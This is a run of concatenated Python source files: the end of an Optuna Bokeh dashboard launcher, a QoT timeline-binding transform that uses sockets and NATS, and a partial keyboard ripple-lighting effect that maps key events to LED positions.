self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _check_bokeh_availability():
# type: () -> None
if not _available:
raise ImportError(
'Bokeh is not available. Please install Bokeh to use the dashboard. '
'Bokeh can be installed by executing `$ pip install bokeh`. '
'For further information, please refer to the installation guide of Bokeh. '
'(The actual import error is as follows: ' + str(_import_error) + ')')
def _show_experimental_warning():
# type: () -> None
logger = optuna.logging.get_logger(__name__)
logger.warning('Optuna dashboard is still highly experimental. Please use with caution!')
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith('.pyc'):
path = path[:-1]
return path
def serve(study, bokeh_allow_websocket_origins=None):
# type: (optuna.study.Study, Optional[List[str]]) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
# We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
# to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
# our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
# to use global variables to pass them.
_mode = 'serve'
_study = study
# TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
# This is not a very clean way to launch Bokeh server.
# Another seemingly better way is to
# instantiate and launch `bokeh.server.server.Server` by ourselves. However, in this way,
# for some reason, we found that the CDS update is not reflected to browsers, at least on Bokeh
# version 0.12.15. In addition, we will need to do many configuration to servers, which can be
# done automatically with the following one line. So, for now, we decided to use this way.
command = ['bokeh', 'serve', '--show', _get_this_source_path()]
if bokeh_allow_websocket_origins is not None:
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(['--allow-websocket-origin', bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
_mode = 'html'
_study = study
bokeh.command.bootstrap.main(['bokeh', 'html', _get_this_source_path(), '-o', out_path])
def _run():
# type: () -> None
# Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
# is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == 'serve'))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith('bk_script_'):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
|
sherlock_qot_transform.py
|
# @file helloworld.py
# @brief Sherlock QoT Python Transform
# @author Anon D'Anon
#
# Copyright (c) Anon, 2018.
# Copyright (c) Anon Inc., 2018.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# System calls
import sys
# Argument Parsing
import argparse
# Signal Handlers
import signal
# Module to Read Core Time
import time
# For Type Checking
import inspect
# For Spawning Threads and using Mutex Locks
from threading import Thread, Lock
# JSON Serialization/De-serialization
import json
# Import AsyncIO
import asyncio
# Import Socket Library
import socket
# Import the Math Library
import math
# Import Array Library
import array
# Import OS functionality
import os
# Share Memory
import mmap
# Import C-Style Structs
import struct
# NATS Python 3 Client
from nats.aio.client import Client as NATS
from nats.aio.errors import ErrConnectionClosed, ErrTimeout, ErrNoServers
# Enum Type
from enum import Enum
# Hard coded maximum ring buffer size
MAX_RING_BUFFER_SIZE = 10
# Timeline Socket Path
TL_SOCKET_PATH = "/tmp/qot_timeline"
# Global Variable used to indicate if the binding has been initialized
initialized = False
class ReturnTypes(Enum):
""" class that implements return types as codes """
QOT_RETURN_TYPE_OK = 0 # Return Type OK
QOT_RETURN_TYPE_ERR = 1 # Return Type generic error
QOT_RETURN_TYPE_CONN_ERR = 2 # Connection error to timeline service
def __int__(self):
return self.value
class TimelineMessageTypes(Enum):
""" qot timeline service message codes """
TIMELINE_CREATE = 0 # Create a timeline
TIMELINE_DESTROY = 1 # Destroy a timeline
TIMELINE_UPDATE = 2 # Update timeline binding parameters
TIMELINE_BIND = 3 # Bind to a timeline
TIMELINE_UNBIND = 4 # Unbind from a timeline
TIMELINE_QUALITY = 5 # Get the QoT Spec for this timeline
TIMELINE_INFO = 6 # Get the timeline info
TIMELINE_SHM_CLOCK = 7 # Get the timeline clock rd-only shm fd
TIMELINE_SHM_CLKSYNC = 8 # Get the timeline clock shm fd
TIMELINE_UNDEFINED = 9 # Undefined function
def __int__(self):
return self.value
class TimelineTypes(Enum):
""" Timeline Types enumerated class """
QOT_TIMELINE_LOCAL = 0 # Local Timeline -> Internal or External Reference
QOT_TIMELINE_GLOBAL = 1 # Global Timeline -> Tied to UTC
def __int__(self):
return self.value
class RingBuffer:
""" class that implements a not-yet-full buffer """
def __init__(self,size_max):
self.max = size_max
self.data = []
self.mutex = Lock()
class __Full:
""" class that implements a full buffer """
def append(self, x):
""" Append an element overwriting the oldest one. """
self.mutex.acquire()
try:
self.data[self.cur] = x
self.cur = (self.cur+1) % self.max
finally:
self.mutex.release()
def get(self):
""" return list of elements in correct order """
self.mutex.acquire()
try:
ret_data = self.data[self.cur:]+self.data[:self.cur]
finally:
self.mutex.release()
return ret_data
def append(self,x):
"""append an element at the end of the buffer"""
print("Added data to ring buffer")
self.mutex.acquire()
try:
self.data.append(x)
if len(self.data) == self.max:
self.cur = 0
# Permanently change self's class from non-full to full
self.__class__ = self.__Full
finally:
self.mutex.release()
def get(self):
""" Return a list of elements from the oldest to the newest. """
self.mutex.acquire()
try:
ret_data = self.data
finally:
self.mutex.release()
return ret_data
class TimelineBinding:
"""TimelineBinding class lets apps bind to a timeline and perform various
time-related operations on the timeline"""
def __init__(self, mode="app"):
# Set the Mode as "transform" or "app"
self._mode = mode
# Initialize Timeline Parameters
self._timeline_uuid = None # Timeline UUID (Unique name)
self._timeline_type = "local" # Timeline type (local or global)
self._timeline_index = -1 # Timeline ID
# Initialize Binding Parameters
self._binding_name = None # Binding Name
self._binding_id = -1 # Binding ID
self._accuracy_ns = None # Accuracy Specification in nanoseconds
self._resolution_ns = None # Resolution Specification in nanoseconds
# Initialize Scheduling Parameters
self._offset_ns = 0 # Scheduling Offset
self._period_ns = 0 # Scheduling Period
# Initialize AsyncIO Loop
if mode == "transform":
self._loop = asyncio.get_event_loop()
# Else: mode defaults to "app"
####### Private Functions #######
# Decorator 1 to Perform Type Checking
def checkargs(function):
def _f(*arguments):
for index, argument in enumerate(inspect.getfullargspec(function)[0]):
if not isinstance(arguments[index], function.__annotations__[argument]):
raise TypeError("{} is not of type {}".format(arguments[index], function.__annotations__[argument]))
return function(*arguments)
_f.__doc__ = function.__doc__
return _f
# Decorator 2 to Perform Type Checking
def coerceargs(function):
def _f(*arguments):
new_arguments = []
for index, argument in enumerate(inspect.getfullargspec(function)[0]):
new_arguments.append(function.__annotations__[argument](arguments[index]))
return function(*new_arguments)
_f.__doc__ = function.__doc__
return _f
def _recv_fds(self, msglen, maxfds):
fds = array.array("i") # Array of ints
msg, ancdata, flags, addr = self._sock.recvmsg(msglen, socket.CMSG_LEN(maxfds * fds.itemsize))
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if (cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS):
# Append data, ignoring any truncated integers at the end.
fds.fromstring(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return msg, list(fds)
def _send_timeline_msg(self):
'''Send a request to the QoT Timeline Service over a UDP socket'''
# Convert message to JSON
message = json.dumps(self._tl_msg)
# Send message to timeline service
bytesSent = self._sock.send(message.encode())
# Maximum message size to receive in one go
MAX_BUF_LEN = 4096
# Received Message
msg_recv = ""
recv_flag = False
# Wait for a response from the timeline service
if bytesSent > 0 and self._tl_msg["msgtype"] != int(TimelineMessageTypes.TIMELINE_SHM_CLOCK):
amount_received = MAX_BUF_LEN
while amount_received == MAX_BUF_LEN:
data = self._sock.recv(MAX_BUF_LEN).decode()
amount_received = len(data)
msg_recv = msg_recv + data
recv_flag = True
# Possible error in receiving message
if recv_flag == False:
print ('Could not receive data from service')
return ReturnTypes.QOT_RETURN_TYPE_CONN_ERR
# Decode Message from JSON
self._tl_msg = json.loads(msg_recv)
return self._tl_msg["retval"]
elif bytesSent == 0:
print ('Failed to send message to service')
self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_CONN_ERR)
return self._tl_msg["retval"]
else: # Message request to get clock shared memory
self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_OK)
return self._tl_msg["retval"]
return ReturnTypes.QOT_RETURN_TYPE_ERR
def _populate_timeline_msg_data(self):
'''Populate the fields of the timeline message based on the instance parameters'''
self._tl_msg = dict()
# Timeline Information
self._tl_msg["info"] =dict()
self._tl_msg["info"]["index"] = self._timeline_index
self._tl_msg["info"]["type"] = int(self._tl_type)
self._tl_msg["info"]["name"] = self._timeline_uuid
# Binding Information
self._tl_msg["binding"] = dict()
self._tl_msg["binding"]["name"] = self._binding_name
self._tl_msg["binding"]["id"] = self._binding_id;
# QoT Requirements
self._tl_msg["demand"] = dict()
self._tl_msg["demand"]["resolution"] = dict()
self._tl_msg["demand"]["resolution"]["sec"] = int(math.floor(self._resolution_ns/1000000000))
self._tl_msg["demand"]["resolution"]["asec"] = int((self._resolution_ns % 1000000000)*1000000000)
self._tl_msg["demand"]["accuracy"] = dict()
self._tl_msg["demand"]["accuracy"]["above"] = dict()
self._tl_msg["demand"]["accuracy"]["below"] = dict()
self._tl_msg["demand"]["accuracy"]["above"]["sec"] = int(math.floor(self._accuracy_ns/1000000000))
self._tl_msg["demand"]["accuracy"]["above"]["asec"] = int((self._accuracy_ns % 1000000000)*1000000000)
self._tl_msg["demand"]["accuracy"]["below"]["sec"] = int(math.floor(self._accuracy_ns/1000000000))
self._tl_msg["demand"]["accuracy"]["below"]["asec"] = int((self._accuracy_ns % 1000000000)*1000000000)
def _populate_timeline_msg_type(self, msg_type: TimelineMessageTypes):
'''Populate the message type of the timeline message'''
# Message Type
self._tl_msg["msgtype"] = int(msg_type)
# Return Code
self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_ERR)
def _nats_subscribe(self):
'''Run the NATS Subscriber '''
self._nc = NATS()
# Connect to the NATS Server
yield from self._nc.connect(servers=["nats://nats.default.svc.cluster.local:4222"], io_loop=self._loop)
@asyncio.coroutine
def message_handler(msg):
subject = msg.subject
reply = msg.reply
data = msg.data.decode()
print("Received a message on '{subject} {reply}': {data}".format(
subject=subject, reply=reply, data=data))
# Parse the received JSON
params = json.loads(data)
# Add the latest parameters to the ring buffer
self._param_ring_buf.append(params)
# Simple publisher and async subscriber via coroutine.
tl_subject = "qot." + "timeline." + self._timeline_uuid + ".params"
sid = yield from self._nc.subscribe(tl_subject, cb=message_handler)
# Loop until the process unbinds from timeline
while self._nats_thread_running:
yield from asyncio.sleep(1, loop=self._loop)
# Disconnect from NATS Server
yield from self._nc.close()
def _dispatch_nats(self):
''' Thread Handler to dispatch NATS Subscriber'''
# Create a Ring Buffer of Clock Parameters
self._param_ring_buf = RingBuffer(MAX_RING_BUFFER_SIZE)
# Append initial value to ring buffer
init_params = {"l_mult":0,"l_nsec":0,"last":0,"mult":0,"nsec":0,"u_mult":0,"u_nsec":0}
self._param_ring_buf.append(init_params)
# Run AsynIO Loop
self._loop.run_until_complete(self._nats_subscribe())
def _find_clkparams(self, coretime):
'''Find the appropriate clock parameters based on the core time'''
# Get the list of stored parameters
param_list = self._param_ring_buf.get()
# Parse the param list to find the appropriate clock parameters
for list_params in reversed(param_list):
# Compare with "last" after converting "last" to fractional seconds
if coretime > list_params["last"]/1000000000:
params = list_params
break
return params
def _core2timeline(self, period_flag, coretime_ns, clk_params):
'''Convert from core time to timeline time'''
if period_flag:
tl_time = coretime_ns + int(clk_params[1]*coretime_ns)/1000000000;
else:
tl_time = coretime_ns - clk_params[0];
tl_time = clk_params[2] + tl_time + (int(clk_params[1]*tl_time)/1000000000);
return tl_time
def _timeline2core(self, period_flag, tltime_ns, clk_params):
'''Convert from timeline time to core time'''
if period_flag:
core_time = int(tltime_ns*1000000000)/(clk_params[1]+1000000000)
else:
diff = tltime_ns - clk_params[2]
quot = int(diff*1000000000)/(clk_params[1]+1000000000)
core_time = clk_params[0] + quot;
return core_time
def _compute_qot(self, coretime_ns, clk_params):
'''Compute the QoT estimates for the timestamp'''
upper_bound = int(clk_params[5]*(coretime_ns - clk_params[0]))/1000000000 + clk_params[3]
lower_bound = int(clk_params[6]*(coretime_ns - clk_params[0]))/1000000000 + clk_params[4]
return upper_bound, lower_bound
####### Public API Calls #######
@checkargs
def timeline_bind(self: object, timeline_uuid: str, app_name: str, res_ns: int, acc_ns: int):
'''
* @brief Bind to a timeline with a given resolution and accuracy
* @param timeline_uuid Name of the timeline
* @param app_name Name of this binding
* @param res_ns Maximum tolerable unit of time in nanoseconds
* @param acc_ns Maximum tolerable deviation from true time in nanoseconds
* @return A status code indicating success (0) or other'''
print("Binding to timeline %s" % timeline_uuid)
self._timeline_uuid = timeline_uuid
self._binding_name = app_name
self._resolution_ns = res_ns
self._accuracy_ns = acc_ns
self._timeline_index = 0
self._binding_id = -1
# Timeline type
if timeline_uuid.find("gl_") == 0:
self._tl_type = TimelineTypes.QOT_TIMELINE_GLOBAL
else:
self._tl_type = TimelineTypes.QOT_TIMELINE_LOCAL
# Return Value
retval = ReturnTypes.QOT_RETURN_TYPE_OK
if self._mode == "transform":
# Start a new thread for NATS which runs AsyncIO
self._nats_thread_running = True # Flag to terminate thread
self._nats_thread = Thread(target=self._dispatch_nats)
self._nats_thread.start()
else: # Assume App Mode
# Create a UDS socket
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Connect the socket to the port where the qot-timeline-service is listening
try:
self._sock.connect(TL_SOCKET_PATH)
except socket.error as msg:
print (msg)
retval = ReturnTypes.QOT_RETURN_TYPE_CONN_ERR
return retval
# Initialize Timeline service message
self._populate_timeline_msg_data()
# Send TIMELINE_CREATE message to timeline service
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_CREATE)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send timeline metadata to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
self._timeline_index = self._tl_msg["info"]["index"]
print ('Timeline ID is %d' % self._timeline_index)
# Send TIMELINE_BIND message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_BIND)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send timeline metadata to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
self._binding_id = self._tl_msg["binding"]["id"]
print ('Binding ID is %d' % self._binding_id)
# Send TIMELINE_SHM_CLOCK message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_SHM_CLOCK)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to request timeline clock from timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
# Get the timeline clock parameter file descriptor from the timeline service
msg, shm_fd_list = self._recv_fds(20, 1)
shm_fd = shm_fd_list[0]
# Memory map the parameters into a byte array
self._clk_params = mmap.mmap(shm_fd, 0, flags=mmap.MAP_SHARED, prot=mmap.PROT_READ)
print("Bound to timeline %s" % timeline_uuid)
return retval
@checkargs
def timeline_unbind(self: object):
'''
* @brief Unbind from a timeline
* @return A status code indicating success (0) or other'''
if self._mode == "transform":
# NATS Thread Join
self._nats_thread_running = False
self._nats_thread.join()
# Close the AsyncIO Loop
self._loop.close()
else:
# Send TIMELINE_BIND message to timeline service
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UNBIND)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send unbing message to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
print ('Unbound from timeline service')
return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_get_accuracy(self: object):
'''
* @brief Get the accuracy requirement associated with this binding
* @return acc Maximum tolerable deviation from true time in nanoseconds'''
return self._accuracy_ns
@checkargs
def timeline_get_resolution(self: object):
'''
* @brief Get the resolution requirement associated with this binding
* @return res Maximum tolerable unit of time in nanoseconds'''
return self._resolution_ns
@checkargs
def timeline_get_name(self: object):
'''
* @brief Query the name of this application
* @return name Application name'''
return self._binding_name
@checkargs
def timeline_get_uuid(self: object):
'''
* @brief Query the name of this timeline
* @return name Timeline name'''
return self._timeline_uuid
@checkargs
def timeline_set_accuracy(self: object, acc_ns: int):
'''
* @brief Set the accuracy requirement associated with this binding
* @param acc Maximum tolerable deviation from true time in nanoseconds
* @return A status code indicating success (0) or other'''
self._accuracy_ns = acc_ns
if self._mode != "transform":
# Send TIMELINE_UPDATE message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UPDATE)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send set accuracy to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_set_resolution(self: object, res_ns: int):
'''
* @brief Set the resolution requirement associated with this binding
* @param res Maximum tolerable unit of time in nanoseconds
* @return A status code indicating success (0) or other'''
self._resolution_ns = res_ns
if self._mode != "transform":
# Send TIMELINE_UPDATE message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UPDATE)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send set accuracy to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_get_coretime(self: object):
'''
* @brief Query the time according to the core
* @return core_now Estimated time in fractional seconds
Note: Core Clock is CLOCK_REALTIME'''
return time.clock_gettime(time.CLOCK_REALTIME)
@checkargs
def timeline_gettime(self: object):
'''
* @brief Query the time according to the timeline
* @return est Estimated timeline time in fractional seconds with uncertainty'''
# Read the CLOCK_REALTIME core time
core_now_ns = int(math.floor(time.clock_gettime(time.CLOCK_REALTIME)*1000000000))
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
tl_time = dict()
# Convert from core time to timeline time
tl_time["time_estimate"] = float(self._core2timeline(False, core_now_ns, params))/1000000000
# Add the Uncertainty
tl_time["interval_above"], tl_time["interval_below"] = self._compute_qot(core_now_ns, params)
tl_time["interval_above"] = float(tl_time["interval_above"])/1000000000
tl_time["interval_below"] = float(tl_time["interval_below"])/1000000000
# Return Timestamp, Upper Bound, Lower Bound
return tl_time
@checkargs
def timeline_set_schedparams(self: object, period_ns: int, offset_ns: int):
'''
* @brief Set the periodic scheduling parameters requirement associated with this binding
* @param start_offset First wakeup time
* @param period wakeup period
* @return A status code indicating success (0) or other'''
self._offset_ns = offset_ns
self._period_ns = period_ns
return 0
@checkargs
def timeline_waituntil(self: object, abs_time: float):
'''
* @brief Block wait until a specified uncertain point
* @param abs_time the absolute fractional time to wake up at
* @return Time at which the program resumes'''
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate timeline time duration to core time
core_duration = float(self._timeline2core(False, int(abs_time*1000000000), params))/1000000000
# Sleep for the duration
time.sleep(core_duration)
return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_waituntil_nextperiod(self: object):
'''
* @brief Block and wait until next period
* @return utp Returns the actual uncertain wakeup time'''
return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_sleep(self: object, rel_time: float):
'''
* @brief Block for a specified length of uncertain time
* @param rel_time fractional seconds time to sleep for
* @return A status code indicating success (0) or other'''
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate timeline time duration to core time
core_duration = float(self._timeline2core(True, int(rel_time*1000000000), params))/1000000000
# Sleep for the duration
time.sleep(core_duration)
return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_core2rem(self: object, core_time: float):
'''
* @brief Converts core time to remote timeline time
* @param core_time time to be converted in nanoseconds
* @return A status code indicating success (0) or other'''
tl_time = dict()
# Find the appropriate clock parameters
if self._mode == "transform":
clk_params = self._find_clkparams(core_time)
# Translate core time to timeline time
tl_time["time_estimate"] = clk_params["nsec"] + (core_time*1000000000 - clk_params["last"]) + ((core_time*1000000000 - clk_params["last"])*(clk_params["mult"]))/1000000000
tl_time["time_estimate"] = float(tl_time["time_estimate"])/1000000000
# Add the uncertainty
tl_time["interval_above"] = float((clk_params["u_mult"]*(core_time*1000000000 - clk_params["last"]))/1000000000 + clk_params["u_nsec"])/1000000000
tl_time["interval_below"] = float((clk_params["l_mult"]*(core_time*1000000000 - clk_params["last"]))/1000000000 + clk_params["l_nsec"])/1000000000
else:
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate core time to timeline time
tl_time["time_estimate"] = float(self._core2timeline(False, int(core_time*1000000000), params))/1000000000
# Add the uncertainty
tl_time["interval_above"], tl_time["interval_below"] = self._compute_qot(int(core_time*1000000000), params)
tl_time["interval_above"] = float(tl_time["interval_above"])/1000000000
tl_time["interval_below"] = float(tl_time["interval_below"])/1000000000
return tl_time
@checkargs
def timeline_rem2core(self: object, tl_time: float):
'''
* @brief Converts remote timeline time to core time
* @param tl_time time to be converted in nanoseconds
* @return core_time tl_time translated to core time'''
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate timeline time duration to core time
core_time= float(self._timeline2core(False, int(rel_time*1000000000), params))/1000000000
return core_time
# Global Binding Class
binding = TimelineBinding("transform")
def init_transform(timeline_uuid: str, app_name: str):
print("Initializing transform ...")
# Bind to the timeline
global binding
binding.timeline_bind(timeline_uuid, app_name, 1000, 1000)
return
# Tranformation Main function invoked by Sherlock
def main(ctx,msg):
global binding
global initialized
if initialized == False:
# Initialize the Timeline Binding
init_transform('my_test_timeline', "qot_transform")
initialized = True
# Get the provided core time
coretime = float(msg)
sherlock_time = float(ctx._Context__msg.timestamp)/1000000000
print('---------------------------------------------------')
print('Received Timestamp from Sensor %f' % coretime)
print('Received Timestamp from Sherlock %f' % sherlock_time)
# Translate to Timeline Time
tl_time = binding.timeline_core2rem(coretime)
print('Translated Timeline time is %f' % tl_time["time_estimate"])
print('Upper Uncertainty bound is %f' % tl_time["interval_above"])
print('Lower Uncertainty bound is %f' % tl_time["interval_below"])
print('\n')
# Send the data to the next stage
ctx.send(json.dumps(tl_time).encode('utf-8'))
return
|
reactive_keyboard.py
|
import numpy as np #check_import
from collections import deque #check_import
import logging #check_import
# todo: some quick tricks to see if keyboard effects work properly and a small demonstration of the effect. currently doesnt support multiple ripple waves
# event with 200 ripples cpu usage is pretty low
class Ripple:
ii = None
jj = None
def __init__(self, pos_i, pos_j, arr_shape):
self.pos_i = pos_i
self.pos_j = pos_j
self.current_r = 0.00001
self.arr_shape = arr_shape
# precompute for all ripples
if Ripple.ii is None and Ripple.jj is None:
Ripple.ii, Ripple.jj = np.meshgrid(range(self.arr_shape[0]), range(self.arr_shape[1]), indexing='ij')
# precompute for this ripple
self.ii = Ripple.ii - self.pos_i
self.jj = Ripple.jj - self.pos_j
self.sumii2jj2 = self.ii**2 + self.jj**2
def step(self):
scale = self.current_r * 1.5 # ripple wave length
output = np.exp( -np.abs(self.sumii2jj2 - self.current_r**2) / scale )
#output *= 1 / self.current_r # decrease wave magnitute over time v1
#output *= 1 / np.sqrt(self.current_r) # decrease wave magnitute over time v2
#output *= 1 / self.current_r**0.8 # decrease wave magnitute over time v3
output *= 3 / self.current_r**0.8 # decrease wave magnitute over time v4
output = output.reshape((self.arr_shape[0], self.arr_shape[1], 1))
self.current_r += 0.7 # speed
return output
def is_visible(self):
return self.current_r < 20 # magic number :S
class CustomEffect:
def __init__(self, arr, driver):
self.arr = arr * 0
self.driver = driver
self.keyboard_mapper = KeyboardMapper(self.keyboard_cb)
self.ripple_list = deque()
def keyboard_cb(self, code, state, position):
# state=0 (press), state=1 (release), state=2 (hold)
if position is not None and state == 0:
i, j = position
self.ripple_list.append( Ripple(i, j, self.arr.shape) )
def update(self):
self.arr = self.arr * 0
output = None
for ripple in self.ripple_list:
if ripple.is_visible():
if output is None:
output = ripple.step()
else:
output += ripple.step()
if len(self.ripple_list) > 0:
if not self.ripple_list[0].is_visible():
self.ripple_list.popleft()
if output is not None:
output = np.clip(output, 0.0, 1.0)
self.arr[:,:,:] = output
return self.arr
def get_fps(self):
return 15
def is_enabled(self):
return True
def on_exit(self):
self.keyboard_mapper.exit()
#################################################################################################################
import inputs #check_import
import threading #check_import
import logging #check_import
class KeyboardMapper:
def __init__(self, callback):
self.selected_device = None
self.callback_function = None
self.is_enabled = True
self.thread_list = []
self.spinner = None
NOKEY = None # There is a led but no key
# "KEY_ " prefix are removed for default_map and will be added in process_map()
# Note: FN key doesnt work with this method
self.default_map=[#| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |
["ESC" , "F1" , "F2" , "F3" , "F4" , "F5" , "F6" , "F7" , "F8" , "F9" , "F10" , "F11" , "F12" , "PAUSE" , "SYSRQ" , "DELETE" , "KPMINUS", "KPPLUS" ], # 0
["GRAVE" , "1" , "2" , "3" , "4" , "5" , "6" , "7" , "8" , "9" , "0" , "MINUS" , "EQUAL" , None , "BACKSPACE" , "NUMLOCK", "KPSLASH", "KPASTERISK"], # 1
["TAB" , None , "Q" , "W" , "E" , "R" , "T" , "Y" , "U" , "I" , "O" , "P" , "LEFTBRACE" , "RIGHTBRACE" , "ENTER" , "KP7" , "KP8" , "KP9" ], # 2
["CAPSLOCK" , None , "A" , "S" , "D" , "F" , "G" , "H" , "J" , "K" , "L" , "SEMICOLON", "APOSTROPHE", "BACKSLASH" , NOKEY , "KP4" , "KP5" , "KP6" ], # 3
["LEFTSHIFT", NOKEY , "102ND", "Z" , "X" , "C" , "V" , "B" , "N" , "M" , "COMMA" , "DOT" , "SLASH" , "RIGHTSHIFT" , "UP" , "KP1" , "KP2" , "KP3" ], # 4
["LEFTCTRL" , None , None , "LEFTMETA", "LEFTALT", None , None , "SPACE", None , None , "RIGHTALT", "COMPOSE" , "RIGHTCTRL" , "LEFT" , "DOWN" , "RIGHT" , "KP0" , "KPDOT" ] # 5
]
self.default_map_inv = {}
self.process_map()
self.register_callback(callback)
#self.listen_for_magic_key() # METHOD-1: LISTEN FOR A SPECIFIC KEYBOARD
self.listen_all_keyboards() # METHOD-2: LISTEN ALL KEYBOARDS
def process_map(self):
rows = len(self.default_map)
cols = len(self.default_map[0])
for i in range(rows):
for j in range(cols):
keycode = self.default_map[i][j]
if keycode is not None:
self.default_map_inv["KEY_" + keycode] = (i,j)
def listen_all_keyboards(self):
for device in inputs.devices:
if device.device_type == "kbd":
logging.info("Listening keyboard device: %s", device.name)
thread = threading.Thread(target=self.spinner_entrypoint_, args=(device,))
self.thread_list.append(thread)
thread.start()
# Listens all input devices, sets selected_device to which gets left or right ctrl stroke first
def listen_for_magic_key(self):
for device in inputs.devices:
if device.device_type == "kbd":
thread = threading.Thread(target=self.listen_for_magic_key_entrypoint_, args=(device,))
self.thread_list.append(thread)
thread.start()
def listen_for_magic_key_entrypoint_(self, device):
logging.info("Listening magic key from device: %s", device, )
while self.selected_device is None:
events = device.read()
if events:
for event in events:
if self.selected_device is None and (event.code == "KEY_LEFTCTRL" or event.code == "KEY_RIGHTCTRL"):
logging.info("Magic key (%s) detected from device: %s", event.code, device.name)
self.selected_device = device
self.spinner = threading.Thread(target=self.spinner_entrypoint_, args=(self.selected_device,))
self.spinner.start()
def spinner_entrypoint_(self, selected_device):
while self.is_enabled:
events = selected_device.read()
if events:
for event in events:
if event.ev_type == "Key":
position = None
if event.code in self.default_map_inv:
